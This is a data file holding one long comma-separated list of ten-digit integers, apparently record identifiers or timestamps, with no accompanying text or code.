116,2890308541,1745952144,2890179266,3324625049,2889990056,2890227043,1746337695,2890218049,1746010717,1746133682,1746285879,1746734374,1746740724,2890097063,1746053847,2890025464,1746687995,1746291818,2890019344,1746078803,1746530514,1746483626,1746920073,2890138866,2890312453,2728379265,1746496518,1746199869,2890339293,1746875392,2889971818,3193831366,1746397351,2890161583,2372226771,2890048173,1746175109,1746014876,2728349718,2890285786,1746366332,1746680576,2890210337,2890381971,1746012605,1746666623,1746149181,1746089246,3193827799,1746134359,1746270851,1746634190,3324631891,1746770483,2889894290,2890095905,1746631395,2890320079,2890344664,1746177148,1746063427,1746009354,2889991537,1746341269,1746571316,2889885207,1745919860,1746525143,2890067626,1746490103,2728335313,1746104369,1746078521,1745950940,1746536140,2890029370,2890191563,1746205519,1746059925,1746159671,1746109055,2889896653,1746310251,1746276239,1746835472,1746299016,1746165330,3324618066,2728269370,1746300964,1746784475,1746836848,2889957485,1746664601,1746265945,2889959348,2890014613,1746905756,2889897310,2890038395,1746826050,1746218557,1746056768,2890234370,1746153311,1746152533,1746072361,1745926930,1746439593,2890142481,2728362065,2890294410,2728362960,2890067113,1745932202,1746438735,1746884327,1822607265,1746673009,2890045130,1746435837,1746387902,1746827727,1746418909,2889917163,1746537391,2890058305,1745988584,1746294612,1746894186,1746169484,1746101576,1746799024,1746400727,1746354566,1745963335,1746470577,2890369849,1746498625,1746211788,1746772071,2728324892,1746345690,2728376389,2890154069,2890389205,2890310031,2890038747,1746913955,1746006281,2890202145,1746627657,1746143310,2890041564,1746610502,1746560752,1746757708,1822607023,2890140843,1746652720,2728343308,1746230819,1746578345,2890316604,2889947974,2890317885,1746292684,1746460203,1746705374,1745891288,2889877574,2890081420,2890182621,2889883844,1746020401,2889960266,1746595744,1746500300,1746668912,2890252359,1746335685,2918529466,2889981339,2890340583,1746119193,2890254376,1746419078,3324609150,1746259365,2728284491,2890226470,2890284892,2890214061,1746603635,1746020564,2889991131,1746267440,2889909709,2889876080,1745924694,1745928207,1746913254,1746038481,2889894701,1746596057,2889931377,1746600673,2890106817,1822611138,2890070255,2728351071,1746205948,1746176013,2889958843,1746136214,1746381701,1746682946,1746129246,1746404365,1746465838,1745923604,2728320264,1746098362,1746079263,2889954510,2889944090,2889941752,1746817677,2890259938,1745966506,1746650548,2890177302,2728302150,3324617054,2372223217,1746783073,2890261697,1746467761,2890088949,2890230813,1746005913,1746444661,2889962212,1746288013,1746291777,1745941833,1746231169,1746606525,1746544539,2728351495,1746432501,1746278950,1746806964,2890167285,2890379728,2728304019,1745907295,2890389231,2890349686,2728302726,1746640721,2890016092,2890318723,1746474925,2890367007,2890392247,1746539378,2372226974,2890244601,1746713100,2890225752,2890011501,1746095750,1745976014,1746894478,2890052984,1745938650,2890186919,3324617763,3324633277,3324628731,3161612375,1746305885,2890253684,2890329212,1746319198,1746607004,1746033099,1746687318,1745910713,2890136453,2728375203,1746720299,1746411510,3324613477,3324608740,2890104741,2890341842,2890324601,1746743257,2890315611,2728356911,1746883443,2728352141,1746593166,1746795739,1746532533,1746008222,1746016363,2890020160,1746292988,3324636629,1746072305,2890020881,2890326528,2728362252,2890189373,2890093273,1746780081,2890301495,1746483984,1745947918,1746436560,1746024188,2889998233,1746018223,1746813797,2889956985,1746163092,2890270961,1746722757,2728313365,1746184995,1746340368,2890258323,1746063455,2890136835,1746391357,1746920814,1746741520,1746483022,2889922103,1746710929,1746141355,2890072775,2890096093,1746801420,1745895397,2889944055,1746880437,1746121247,2890346189,1746567966,1746359027,1746129801,2890332376,2890017271,1746555475,2890181148,2890138423,1746319695,1746534731,2890029808,1746354238,2889996612,2728310675,1746235172,1745946378,2889882489,1746225663,2728376027,1746377375,2728286540,1746012137,1746703285,2890235972,2728367691,1746517980,1746500276,1746695122,2889883075,2890381754,1822616977,1746770780,1746416566,1746012845,1745919254,1746778326,1746798802,2890110936,2890124643,2728264445,1746219328,2890264690,1746466044,1746613686,1746254383,1746018102,2890316984,1745925499,1746440885,1746452313,2728326866,1746388624,2890294305,1746090472,2889959378,2890376206,1746525928,1746473243,1745908065,1745979801,2890192305,2890213910,1746099603,2889896488,2889947491,2890172474,2890064167,1746280981,1746188055,2890195604,1746788418,2890074376,1746089993,2890235035,2890144734,1746761781,2728286226,1746875523,1746760625,2728269819,1746455751,1745919038,1745890804,2889955519,2890070926,1746782453,2890131373,2728319630,1746306779,2890105146,1746374119,1746103329,2728355398,1746337327,1746027834,2890094169,2889969207,1746170382,2890199976,1746129277,2890342122,1746621847,1746870677,2890253419,1746903332,2890335851,1746174542,1746634150,1746530871,1746616933,1746325396,1746795860,1746305308,2728390887,2889954831,2889878441,2890157146,1746201442,2890317036,2890322587,2890099521,1746736287,1746066591,1746342015,1746673349,1746759570,1745990940,1746627333,2890156153,2728316658,1746802606,3324632379,1822617793,2372226847,1746378020,1746634943,1746236966,2890148783,1746105946,1746393056,3161612536,2890010684,2890215535,1746441427,1746593130,2890386657,2890002385,1746197546,1746623211,3324611025,2889963670,2890012143,2890222869,2890191878,1746542702,1745894837,1746660934,1745921078,2890301119,2728341341,1746769188,1746152231,1746403580,1746357841,1745998575,1746501551,1746744479,1745954983,1746110512,1729547263,1746332776,2890050067,1746233562,1746583093,1745884407,1746765393,2890342729,2890161949,2890092944,1746478942,1746424714,2728302142,1746800764,2728350952,1746240272,1745992175,2890206688,1746170100,1746007729,2890318734,1746220409,2890106909,1745950877,1746073012,2890383218,3161613258,1746398224,1746642778,1746864094,2728391039,2890217883,1822620172,1746628585,1746057971,1746897465,3161615085,2889896598,1746807482,1746281006,2890243056,1746700273,1746539311,1746794985,1746073621,2890021064,2728289859,2890334386,1746430555,2890367116,1745933515,2890022162,2728321419,2890171433,1745994066,1745989368,1746684605,1746895061,1746225424,1746676170,1746746415,2890268723,1745962085,1746838384,3324635090,1746074766,1746582368,2890186511,1746522064,1746472352,1746177029,1746739068,2890332649,1745898642,1746367636,1746096313,1746236219,1745993458,2890066157,1745879573,2890122903,1746673486,1746727112,1746209138,2890088002,1746228996,1746907338,1746232399,2889968364,1745997636,1746741207,2889943724,3324616396,3324623760,1746090721,1746881105,1745890366,1746006766,1746774347,3320508802,1746213975,1746456324,1746534052,1745979729,1746400381,2890057068,2890264498,1745924943,1746874489,1745923077,2890167619,2890068650,1746922316,1746467272,1746349289,2728366472,2890398117,2889903635,1745943481,2728375254,1746499286,1746481949,2890270686,1746284209,1745961724,2890112151,2728357325,1746333852,2890344229,2889953462,1822617907,1745925073,1746749580,2890289870,1746480189,1746922031,1746004992,1746357291,1746384243,1746699035,1746715758,1746631658,2728375708,1746472833,1746255288,1746422228,1746129599,1746835194,1746289527,1746387816,2890085940,2889903737,2728386838,1746546992,2890291767,2728367041,1746324921,2889976222,1746276334,2728310554,2890155519,2890070209,1746794836,1746309041,1746349131,1746129539,1746063875,2890356265,1746479839,2890268922,1746508855,2890231247,2890032733,2890125165,1745993972,2889911461,2890165827,1746257673,1746174087,2890285886,1746029518,1746679136,1746351428,1746471183,2728345662,1746073905,2728290015,1746843445,1746346716,1746072032,2890326029,1746826508,1746682769,1746701676,1746798873,1746435702,2890383608,2890279402,2890352953,1746660353,1746142330,1746400391,1746166525,2890003176,1745913477,2890254267,1746107964,1746334225,1746019249,1746522081,2728266823,1746100952,2889926656,1746619674,1746194917,2890384587,2197834699,2890396914,2372238813,1746461377,1746902310,1745902730,2728292925,1746547729,1746169421,1746303451,2728277018,2889992985,2890201769,1746745429,2890117248,1746820331,1746265484,2890084480,1822619087,1746172886,1746703126,1746707937,2889993770,2889962065,1746119126,1745898461,1746748448,2728339173,1746656766,1746165560,2728279334,2890206868,1746414708,2890058127,1746302919,2890376753,2890164818,2890117299,2890183502,1745985257,1746663979,1746005691,1746178629,2890143349,2889939502,1745917191,1746592187,1746917655,1746278845,2890052572,2372236556,1746599425,1745960931,2728318119,1746145329,1746096811,1746778412,1746389940,1746878888,1746280652,1746045480,2890204887,2890296682,1746637080,2890379674,2890271454,2728328674,2890284855,2890203925,1746545622,1745910945,1746528310,2890308048,1746209161,1746302560,2890088321,1745886428,2728287273,1746499475,1746794295,2890190561,2890321216,1746566354,1746769513,1746032812,1746147757,1746604002,1746019934,1746037848,2728335873,1746314933,2890125914,2890369510,2889950568,1746121892,2890010270,1745956874,1746726730,2889893964,1746311328,1746764992,1746377006,1746110175,1746225998,2372235117,1746467849,1746170630,2728341440,2728320139,1746914541,2890242856,2890106168,1746391176,1746122537,1746227681,1746165776,2890125562,2890293388,1746203316,1746655167,1746317867,2890073159,1746884854,1746554829,2890078955,1746508734,2889978740,2890052041,1746660886,1746090964,1746153339,2890055925,3161615367,1746065811,3324624582,2372233645,2889906722,3324634155,1746853855,2890021207,1745882863,1746580072,1746008113,1746228272,1746794428,3193828663,2890038126,1746750280,1746359700,1745972227,1746208126,1746011565,2890290733,1746322427,1745900413,2890210285,1746031087,1746206496,2890003142,1746104109,1746270599,1746469181,1746817962,2890136928,1746795840,1745927834,2918529331,1746742818,2890226196,2890310394,2728291867,1746177486,1746681919,2890334124,2728311660,1746257253,2889935840,2890067733,2728314050,1746127634,1746475931,1745908869,1745940645,2890226911,1745901666,1746460374,1745958907,1746789510,1746125655,1746869519,1746583114,1746657346,1746156021,1746000407,2728275239,1746605143,1746686174,2890194927,1746215790,2890143739,2890058788,2889884340,2890195325,1746258523,2890249832,1746506837,1746463770,1746081845,2890356212,1746070884,1746846908,2890265024,1746123795,1746082851,2890204547,1746515999,1746162072,2890280999,1746490577,1745989912,2889886602,2728335392,1746704052,1746086241,1746598347,1745972929,2890289357,1746889809,1746887548,2890064888,1746108061,2889932619,1746081446,1745961994,2889938608,2889956187,2890259902,1746199162,1746462324,2728387328,2890157573,1746843074,1745944543,1746099760,1746860453,1745904061,1746402098,1746640525,1746560141,2890100478,1746876577,1746863292,1746125894,1746154488,1746553595,1746485169,2890068474,1745934329,1746473205,1746833956,1746630850,1746628713,1746012881,2890398869,1746398298,1745923957,1746405188,1746103522,1746019106,1745982540,1746784458,1746514692,1746007661,2890161166,1746217774,1746154936,1746241720,1746547880,2728296598,2890124470,1746423545,1746289883,1746186759,2890278673,2890342899,2728381148,2890082392,1746213626,2890120347,2890301219,1746603462,1746732411,2728327460,1746310649,1746476181,1745971773,1746621110,1746315202,2728264452,1746734612,1746654837,2889998917,2890004270,2890182148,1746036191,2728356972,1746630643,2889882020,1746133068,1746706178,1746278930,1746551754,2890196823,2889913227,1746376314,2889935764,1746599477,2889936205,2728334882,1746572729,1746511624,2890260279,3324613978,2728269780,1745974109,2890062002,1746542198,2889979795,1746684411,1746781412,1746011972,2728265660,1746864269,2728307470,1746787818,1746524670,1746900764,1746093436,2890325373,1746263175,1746796680,2889950360,2890271044,1746613614,1746173006,2890236785,2890084639,1746096567,2890376189,1745920676,2728342799,1746065315,2890003147,2890061117,1746321119,1746430061,1745893660,1746432685,2890369483,2889958313,1745947359,1746329817,2890158349,1746763087,2890290104,1746842913,3324619528,1746303299,2890176573,1745888422,1746312059,3324628466,2890248927,1746188745,1822613684,1746642274,1745956015,2890105252,1746746667,1745882873,1745942739,1746740952,1745996068,1746275296,2890204602,1746256672,2890026596,1746219447,3324623466,1746524455,1746395827,2889959792,1746310881,2890198571,1746550735,2890319447,1746036905,1745891915,3324621019,1746791904,1746927335,1746675676,2890358673,1746511306,1746674898,1746751127,1746043076,1746021760,1746866757,1746587073,2890057995,1746894922,2728360414,2889967140,1746636372,2728304996,2890199386,2728266965,1746707749,2890235676,1746665892,2890117207,2890084415,2889925309,1746298745,1746621019,1746497086,1745939849,2890303330,3324637617,1746727686,1746251860,2890304737,1746909244,1746800765,1746256934,1746400596,2890124157,2890167204,1745898955,1746253301,3324636424,2890081974,2890195906,1746121118,1746677365,1746317521,1746188620,2728315700,2890025728,1746660649,1746522135,2889932853,2889991468,1746435513,2889885549,2890032222,1745989085,2890199233,3324630542,1746108691,2889943118,1746229336,1746421495,2918527592,1746875376,1746537054,1746613498,1746272322,2890146058,1746690507,2890315263,1746305580,1746443703,1746425056,2890311670,2890202401,1746737783,1745965255,1746720048,2890089430,1746046991,1746289451,2728281381,1746087705,3161614969,1746104178,2890017237,2890166115,2889956563,1745953293,2890237180,1746128515,1746752018,2890295561,1746282862,2890153622,1746045054,2890199852,1746099689,2890371561,1746337870,1746707792,1746769005,2728346269,2890113891,2890382857,1746768926,1745936639,2890154828,2890122849,1746740447,1745896510,1746876881,1745938329,2890329750,1746744200,1746894342,1745971694,2890067321,1746700463,1745923340,1746912092,1746292130,2728273162,1746144810,1746131302,1746770259,2890057078,1746244491,1746626589,1746450114,2889926231,2890381125,1746068977,1746793288,1746735566,1746065410,2890228000,2890067752,1746500204,2728372079,1746357901,1746826385,1746454515,1746432802,2890131180,1746133220,2890115015,1746376706,2890167309,2890109342,2918529076,1746516237,1746570141,2890331655,1746581503,1746545698,2890002701,2728264813,2889986386,1746110458,1746037849,1746176408,2728319058,1746568699,2890304779,1746465211,1746710692,1745896017,2889901973,1746429289,1745933249,1746653977,2890104236,2890158384,1746658706,1745881756,1746909942,1746326884,1746517571,1822616034,1746926033,1746608828,1746336106,2890137978,3193828826,3161615288,2728298760,1746420559,2890073838,1745915595,1746309685,2889889861,1746469962,2890003340,2889984698,1745995991,1746533710,2889965213,1746729684,1746282189,1746239758,2890283470,2889907053,1746076138,1746248674,2890129624,3324608918,2890378863,1746061810,1746288375,2890228111,1746165003,2889891678,1746510732,2890390091,1746283702,1746380481,1746665175,3324632770,2889998259,2889885322,1746895207,2890159359,1746030439,1746174721,1745925079,1746277329,1746808894,1746354745,1746343961,1746816767,1746545615,2890243092,1746594722,2728322266,1746903909,1746744174,2889908276,1746871430,1746243383,3324612238,1746638499,1746901303,1746559457,2890050867,1746552271,1746189619,2890378235,2890344717,2890336693,1746761237,1746505311,1745990904,1746818622,2889896969,1746061697,1746913601,1745901342,2890353964,1746773256,1746233387,1746019113,2890389553,2889881321,1746530805,1746611717,1746707337,2728313764,3324624778,1745899588,2890208011,1746765069,1745959162,1746300905,2890293153,2890399311,1745883941,1746335542,1745928670,2889948202,2728285069,2890274911,1745957288,1746853775,1746490235,1746703774,1746806529,3324613077,1746464674,1745915524,1746706649,2890246880,1746302915,1746361326,1746018764,2890139618,1746699081,1746242278,1746642681,1746542434,1746737884,2728339021,1746357611,1746785462,2890099315,2728315076,1746705619,1746105457,1746508427,2889920438,1746527674,2890001150,1746521649,1746568234,2890000273,1745972236,3161612572,2890223922,1746094125,2890008120,1745897779,1746727500,1746585170,1745908871,1746452727,1746635542,2889983758,1746524832,1746522228,1746330524,2728315449,2728322011,1746186260,1746091312,2890081414,1745885879,1746475070,1746369510,1746379259,1746868156,1746121472,1746775273,2890112679,1746832302,1746792322,2890100847,1746134086,1746325706,2890220124,1746812689,1746616453,1746555057,2728326224,2890019242,2890117758,2890271689,3161615314,2890317640,1745918339,1746908024,1746864641,2890219634,2890362393,1746620888,1746878020,3324620476,2890285678,1745882589,2889923746,2889997120,1746556230,1746483779,1746234618,2890292030,1746770783,2890137591,2890004121,2889889781,1746305315,1745887815,2728367252,1746915504,1746760877,1746457051,2890079280,1746159578,2890244810,2890045887,2890187591,2889962046,1746288587,1746378136,1746282737,1746319113,2890333573,1746760808,1746104750,1746349283,1746592129,1746193137,2890216555,1746037081,2890157131,2889891067,2890021082,2890329850,1746467295,2372236867,1746624299,1746481895,1746026793,1822620575,1746121121,1746578012,2889928271,1746033012,1746645222,1746366449,1746683562,1746267658,1746817462,1746568832,2890320430,1746101947,1746349585,1746910224,1746571958,1746912517,2728276450,1746222122,1746424996,2890025333,1746383526,2889949029,1746542958,1745905625,1746535246,2889976353,1746130462,2728316647,1746116785,3324622329,1746598393,2889938030,1746167386,2890109749,2728304114,1746273645,1745944667,1745902618,1745898406,1746763274,1746436733,2890165287,1746800031,1746176273,2728294527,1746560467,1746735253,2890268566,1746703109,2890162472,1746633079,1746422315,1746892249,1745883530,1746286878,3324637269,2728324958,1746281752,1746388469,1746839180,1746694575,1746848790,2372236439,2728366995,2889995707,1746186135,2889923006,2890155763,2728318073,2890191980,1745969347,2889970818,1746166829,2728326569,1746484524,1746618428,2889971213,1746780023,1746479155,1746159543,2918528578,3324639789,1746530893,1746917290,2890394224,1746678215,1746012976,1746888395,1746917266,2889987373,1746656431,1746544253,1746013484,2890025582,2889983643,1746379059,1746252883,1745923626,1746526956,1746291084,3324610014,1746188639,1746520967,2890039807,1745988024,1746384981,1746013323,2890277097,1746188666,1746886094,2890318245,1746604204,2728362768,2889954303,2890027771,1746193788,1746283623,2890365369,2890222884,1746346113,2890302017,1746387979,2890087851,2889926182,1746295239,2890309617,1746705086,2890320922,1746582949,2890191424,1746499971,1746098245,2728340232,2890356052,1746329901,1822613384,1746706904,1746071627,2728360502,2890068693,2890147704,1746807684,1746352228,2890212329,1745970153,2890095529,1746478560,2890293512,1746789435,2890001802,1746635069,2889932902,2890385639,1746225522,1746769350,2890335976,1745918980,1745920406,1746251679,2890344586,1746278721,3324618175,2890372801,2890399225,1746127207,1746908904,1730086791,2889923852,2372226150,1745973148,2889938690,1746695439,1746248907,2890264458,1746898060,2890228568,1746094786,1746678660,1745988204,1746766522,1746892915,1746850939,2890016340,2890076564,2890371280,1746034729,2890224947,1746054378,1745895159,1746644530,2889889976,3324640132,2890396196,1746619110,1746477746,2890306291,1746209063,2890226808,1746278992,1746144496,1746151494,1746660430,2890360700,1746129060,3324615082,1746152882,2889908641,1746688134,1746048582,2728316497,1746379290,1746708509,1746437494,2890088855,1746027267,3324616910,1746709647,2890389173,1746501411,1746118954,1745968119,1746435377,2728362977,1746822726,2728267216,2890195831,1745897394,1746559612,2890251121,1745982199,2890233941,1746803161,2728268002,1746098589,2890125702,2890349993,2890341187,1746031412,2890116121,2890314831,1745967493,2728311815,2889879606,1746189744,1746488461,1746047426,2890243590,2889996178,1746586343,2890332230,1746847194,1746169392,2890032563,1746277550,3193827570,1746752394,1746806447,2890031263,2890235910,1746027432,1746250302,1746327631,1746698992,2889909626,2728279529,2890331287,1746104331,1746028417,1746556637,2890165339,1746637709,2890254487,1746667557,1746106393,1746123531,2890220596,1746663819,1746397894,2890398069,1746268070,1746298846,2889892767,2890208931,2890233680,1822616774,1746343452,1746502069,2890297435,2372239323,1746024453,2889966328,2890376808,1745961140,2890042535,1745937875,1746154158,1746101173,1746724514,1746892028,1746723658,3324638329,1822610570,2889884307,1746723367,1746591163,2889921857,1746527138,3324634053,1746449523,1746739712,1746341110,1746689805,1746250872,1746456277,2728345669,1746725278,1746227500,2372236091,2889888780,3161612623,2889882995,2728310570,2890023342,2728280021,1746253599,2728347759,2890300841,2728330695,1746075198,2890133344,1746600528,1746646021,1746268173,2890356780,2889919075,2728364680,1746343324,1746312456,2889907642,2728332742,1746352438,1822615231,2728363843,2890376095,1746304101,1746092537,2890245021,3324619020,1746334576,1746155024,2889897688,2728306235,1746426243,1746008960,1746324428,2890374177,1746652691,2889952966,2890032346,1746873393,2889903243,2890010042,1746804631,1746622030,2889901359,1746513237,2890305259,1745887405,1745891137,2890070934,1746289390,1746252248,1746137775,2890120516,2890320262,1746798514,2890078660,1746895039,2728307278,2372232729,2728356353,1746455820,1746516227,2728342607,1746457916,2890186784,2890334821,1746410848,2889906188,1746425119,1746110120,1746826977,1746157533,2372231454,1746197710,2728374377,1746487805,2890301710,1746590065,1746462965,2890335579,1746445038,2889971709,2889939215,2890215817,1746133145,1746459670,2372231502,2890192136,3161614217,1745925857,1745972844,1746087042,1746253120,2889884042,1746422437,1745959259,1746157750,2728376769,1746341332,1746098968,1745892443,2890081380,2890249541,1746459023,2890112985,2890177509,2890121077,1746454503,2918529382,2889934570,1745938521,2889922074,2889917932,2890208535,1746144287,1746911483,1746912883,1746577046,2728380535,1746089472,1746882112,1746264981,2890239115,2889925734,1746697967,1746454787,1746865234,1746492981,2890265184,2889942707,1746330366,2889910192,2890081848,1746162469,2889980913,2890243712,1746229098,2889978353,1746853385,1746374346,2728283235,1746484802,2890383811,1746816070,2890050679,1745890922,1746893048,1746689021,1746726935,1746600097,1746158411,2728298646,2890353818,2890127199,1746056063,1746842890,1746715165,1746523562,1746151014,1745982469,2728356038,1746810213,2372228813,1746860779,1746006347,2890189531,2890074731,1746009551,2728351637,2728363788,1745888271,1746277802,1746282526,1746215398,3324614774,2889902395,1745918533,2890301069,2890010109,2890308170,1746549787,2890136620,2890054022,1746526245,2889955223,1746221770,2889884627,2889988481,1746054346,1822607351,2890102260,2890114433,1746242821,1745955119,2889899211,1746157555,1746440923,1746288226,2890086031,1746451095,1746068784,2890384729,2728335955,1746096800,2889887636,1746063989,1745971311,1746690160,2890345498,1745965995,1746242733,1746697611,1746185986,1746483812,1746309554,1746709700,1746568802,1746050681,1746611370,1745947947,1746337654,2890029662,2890239911,1746638829,1746156183,1745971397,2890391212,2890253592,1746385853,1746824418,2728328910,1746650415,1746449934,1746488327,1746736695,1746337752,1746246605,2728286146,1746137919,2890152375,1746379381,2728373693,2889887399,2728264479,2728294661,1746258233,1746521191,2890357553,1746567501,2890081869,1746725734,1746704124,2890126795,2890261048,2890319902,1746455383,2889890030,1822613401,1746143140,2728299792,1746693399,1746504522,1746296168,1746546966,2890291006,2889940727,1746335783,2890215927,1746284890,1745925367,1746067873,1746133073,2890011145,2890047944,1746431928,2890188401,3324631883,1745915019,1746216049,2728321389,1746724614,1746297318,1746821855,3324637340,1745908622,2728376472,1746757047,2890275079,1746745179,1746164765,1746838884,1746490125,1746844949,2890131304,2889926993,1746520919,2728369903,1746005559,1746802324,1746251170,1746752527,2890344742,1746083240,2890033212,1746355876,2890135329,1746324379,1746505399,1746866900,1746837482,1746291421,1746807207,1745968904,1746263815,2728277032,1746503049,1746815579,1746711015,2890213414,1746599119,1746070668,1746563097,1746630328,2890288193,2728344111,2889912259,1746263002,1746334408,2728334904,1745941887,2890346120,1746871854,1746225250,1746334957,1746474531,1746259487,2890210771,1746121196,2890193729,1746148641,2890286555,1746907267,2889991572,2889948321,1746650910,2372228566,1746813005,1746195988,2890383039,2890227052,1746180293,2890179904,2890260182,2890181542,2889893922,1746396789,1746422835,1746079952,2890156245,1746157940,1745980857,2889879677,1745939755,1745952960,1746556737,1745957764,3324612195,1746196744,1746176326,1746562607,1746400961,1746181921,1746530546,2728371488,1746820890,2890161040,1746420545,2890228364,2890109457,1746316788,2372226685,1746427045,1746176643,1746886965,1746168027,1746819337,1746212484,1746170641,2890331385,2728264266,1746154800,1746758155,1746566108,1746661086,1746923038,2889894131,2889983325,1745973158,2889952851,1746898359,3324640726,2890166993,1746459980,3324624574,1746648850,2728270173,2728294453,2890037684,2890001932,1746478520,2728264876,1745887684,1746640574,1746519740,2890038707,1746583047,1746785854,1746207901,2890004961,2890250152,2890051173,1745905606,1746029320,1746906760,1746830193,2728282101,2890143858,2890210616,1746482852,1746111736,1746537128,2890191513,1746152805,1746398462,1746832676,1746843373,1746701579,1746529590,1746284640,2890343201,1746597461,1746141769,1746233945,1746202754,1746844287,1746235235,1746544357,1746916411,1745881526,2890051092,1746145311,2889973812,2890304931,1746493592,1746563140,2890303606,1746867550,1822607827,2890331708,2728356560,1746267074,2890106776,1746448413,1746555285,1746325443,2728288631,1746908844,1746905159,1746724063,2728349464,3324619588,1746026966,1746521190,1746919627,1746067657,2728362277,1746524007,2728382248,1746018390,1745973668,3324636428,1746302157,1746799291,1745962660,1746397724,1746456103,2890390928,1746055174,2890293269,2890309759,3193831133,3193830623,2728333767,1746240247,1745974769,2890147730,1746213870,2890348239,2890217904,1746393231,2889904871,2728284317,1746321397,3324610449,2889906175,2890155102,2728375214,2728352023,1746811334,2890239920,2890298889,1746748827,1746663494,2889992732,2728266814,2890121936,2890135525,1822607663,2728323324,2890268575,3324612299,1746397666,1746178006,1745960435,1746797019,1745932568,1746587765,1746783954,2728374880,2728334193,1746366774,1746709572,1746556372,1746375928,1746424319,2728300223,2889967641,1746215416,1746577208,1746281661,1746441955,1746492902,1746452939,1745889579,1746098841,1746311003,2728376168,1746833077,2890246726,2890182000,1746560540,1822613042,1746617435,2728371964,1746431028,1746438743,1746464284,2890125631,1746497175,1745996596,1746268947,1822608782,2728381396,2890243777,1746160852,2890157605,1746188755,1745969990,2890199631,2889996580,2890089325,1729492863,1746927115,2890369939,1746758109,2728331344,1746511723,2890300849,1746610628,1745994352,1746653513,2890047084,1746436615,1745909346,1746308256,1746646110,1746775210,1746025907,1746687044,2728294679,2728281428,1746430858,2890240590,1746659152,2890073087,1746366878,2890246239,1746071504,1746506291,1746746863,1746598517,2890216381,1746041853,1746541444,1822615755,2728304954,2890214809,2889989357,1746192590,1746337275,1746531804,1746546997,1746015908,3161614474,2728289683,1746515166,1746057651,1746664211,1746790756,1746804758,1746315627,1746468815,2890264464,1745915396,2889962429,2890362736,1746194321,1746447601,2890240322,2728353096,2889959592,2728321602,2728274723,1746170673,1746551110,1822611975,2728314446,2890174452,1746185412,3324612246,1746607824,1746676275,2890102262,1745945974,2890385463,3324611594,2728350690,2889968046,1746202203,1745952192,1746643020,1746472253,1745896426,2890350448,2728367438,1746482038,1746495306,2889992706,1746502511,1745977399,1746218945,2890083606,3324624409,1746432909,2728326564,2728319050,1746338354,2890261539,1746864302,1746870692,1746068623,2372237048,1745966544,2890323188,3324630271,1746745170,1746429062,2890164495,2890096696,1746072824,1746828933,2728389068,1746806041,1746179086,2890217355,2889986289,1746262724,2890024462,1746426662,1746847003,2890298590,1746721936,1746160786,2890315520,1746782953,1746296096,1745906446,1746536270,2728317787,1746766859,1746357180,2890246459,1745888102,1746253924,1746253162,2889964451,1746047527,2889982157,2889964521,1746021625,1746452732,1746629673,2890116402,2889917116,1745913415,1745933803,1746925838,2889929129,1745987070,1746583299,2889910953,2890030758,1746258349,1746384595,2889955211,1746048471,1746875597,1746877535,1746384392,2889925888,2890399507,2890085166,1746915941,1746724951,1746869473,2890208319,2890002933,2890253090,1746093155,2890175945,2890082888,1746103796,2372235826,1746836452,1746791059,1746346920,2890306904,2890245517,1746625641,2889977335,2728304565,1746671909,1746626740,3324625234,2890277053,2728280933,2372227472,2890004321,1746842300,1746243038,2890012227,2890272072,2728308781,1746138440,2890115006,1746918890,1745914567,2890340826,2728268379,1745937679,2890394974,1746197466,1746679052,2889958755,1746667589,1746668855,1746218462,2890237353,1746206288,2889894626,2728337665,2890009864,1745956770,1746487344,1745952872,1746848277,2889954237,2890301693,1746904359,1745926576,1746547022,2889944364,1746485806,2890035818,1746892305,2728327163,1746474618,2728291482,2890224517,2890350086,1746483763,1746325926,1746154564,1746472537,1746639346,1746095561,1746824152,2890168435,1746892749,2890239912,2889955770,2890169126,1746916565,2889903645,1746442400,1745930038,2889948517,2890164917,1746033279,1746501846,1745891262,1746066997,2728337472,1746842054,2890026442,2889882797,1746323233,1746351238,1746697529,1746905110,1746166760,1746623249,1746731718,1746127202,2889894021,1745884345,3324627588,2728378492,2890021284,1746413033,2890102184,1746026414,1746514467,1746306942,1746885854,2728315137,1746825665,1746510210,1746074432,3324614842,2889981588,1746149256,1745986329,1746759642,1746237229,1746012970,1746725532,1746340263,1746446588,1746106229,2890123585,1746678074,3324609379,2890148360,1746029462,1746081756,1746851991,1746035917,2890001220,1745985205,1746483202,2728278710,1746435222,1746175151,3324624527,1746393436,2728268044,2890106023,2890270797,2889946780,2728292178,2890142233,2728291884,1746090748,1746515881,1746044459,1746567024,2890079256,2889997327,3324630483,2889971356,1745899454,1746856540,2890138985,1746429116,1746532254,1746752236,1746825196,1746849423,1746503455,1745880905,2890150981,2890344204,1746089662,1746089811,2728304716,2890284229,1745885420,1746827867,2889996496,1746655214,3324621890,1746364146,1745974082,1822607328,1746518052,1746282062,2890333635,3324629653,1746795632,2890122180,2890056504,1746021176,1746348710,2728346179,1746041918,2889968214,1746013539,1746256605,2728334940,2889881472,2890208196,2890089185,1746238242,1746845765,1746648954,2890299022,1746766818,1746852317,2890292411,2889916147,1746663482,1745971691,2890348406,2889964948,1746565358,1746465822,2890098743,1746413404,1746792539,2890063965,2890210780,1746499022,1746198374,1746323347,2372237372,2889943980,1746908140,3324638253,1746847598,1746742751,1746491626,1746502534,1746388487,1746349364,2890164558,2889990937,3193830261,1746296988,1745986776,1746854131,2889899324,1746368394,1746390560,2890383733,2728311816,1746516445,1746362062,1746262544,2728350074,1746731281,1745974306,1746680890,1746321099,2890311546,1746566489,2728382447,2890391890,1746822586,2889899808,1745988116,2889929416,1746884618,1746302836,1745925640,1746185165,2372223227,1746892268,1746474050,2890198969,1746900579,3324629346,2728263884,1746390469,2889917221,1746236928,1746265405,1746218347,1746187180,2889884241,1745888728,2890285994,1746009078,1746432187,2890233199,1746206338,1746534040,1746847984,1746118526,2890337865,1746836187,2728306059,1746255687,1746621254,1746201889,2890343688,1746869659,2728381745,2890397384,1746887002,1746210098,1746054134,1746167585,2890214923,2890300536,1746601145,2890282150,1746525688,1746684031,1746523662,2889906662,1746356131,2890158801,1746159054,1746899066,1746764096,1746474299,2889969606,2890192147,2890341146,1745928420,1746615587,1746542252,1746054603,1746341532,2890220350,2890172083,1746285826,2890054115,2728334743,1746923135,2890008839,1746330234,1746402140,2890097179,1746219808,1746065927,2728270687,1745976971,2890228736,2889911102,1746291052,2728352100,2889936430,2728348806,2890334718,1746637401,1746480017,1746177901,1746342104,2728331572,1746736216,1746797971,1746765004,1745973091,1746051532,1746464599,1745937944,3324638538,1746366647,3161613843,2890145670,2890340077,1746478099,2890355731,2890366489,1746121982,1745991094,2890342645,1746818125,1746522294,1746067165,1746055653,1746130005,1746096744,1746628631,1746707496,1746320832,2889879194,2728366740,2890393253,1745910952,2372230367,1746744262,1746046828,1746109498,1746482609,1746712006,2890179656,1746050013,1746170793,2890227197,1746456955,2890039970,2728354506,1746179139,1746885095,289024970